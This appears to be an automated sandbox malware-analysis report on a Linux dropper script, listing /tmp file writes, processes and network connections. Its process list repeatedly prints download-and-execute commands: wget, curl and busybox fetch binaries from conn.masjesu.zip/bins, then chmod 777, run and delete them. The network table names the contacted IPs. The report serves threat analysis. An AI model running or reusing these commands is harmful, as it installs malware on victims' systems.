| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c | /usr/bin/curl | N/A |
Processes
/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/chmod
[chmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
[./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/rm
[rm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/chmod
[chmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
[./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/rm
[rm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/chmod
[chmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
[./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/rm
[rm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/chmod
[chmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS
[./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/rm
[rm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/chmod
[chmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj
[./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/rm
[rm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/bin/chmod
[chmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c
[./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/bin/rm
[rm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/bin/chmod
[chmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk
[./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/bin/rm
[rm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/chmod
[chmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN
[./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/rm
[rm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/chmod
[chmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v
[./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/rm
[rm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/chmod
[chmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb
[./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/rm
[rm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/chmod
[chmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I
[./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/rm
[rm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/chmod
[chmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28
[./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/rm
[rm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/chmod
[chmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc
[./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/rm
[rm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/chmod
[chmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa
[./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/rm
[rm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/chmod
[chmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28
[./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/rm
[rm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/chmod
[chmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN
[./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/rm
[rm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/chmod
[chmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v
[./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/rm
[rm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/chmod
[chmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb
[./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/rm
[rm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/chmod
[chmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I
[./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/rm
[rm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/chmod
[chmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc
[./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/rm
[rm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/chmod
[chmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa
[./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/rm
[rm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/chmod
[chmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj
[./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/rm
[rm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/chmod
[chmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
[./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/rm
[rm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/chmod
[chmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
[./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/rm
[rm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/chmod
[chmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
[./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/rm
[rm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/chmod
[chmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS
[./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/rm
[rm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
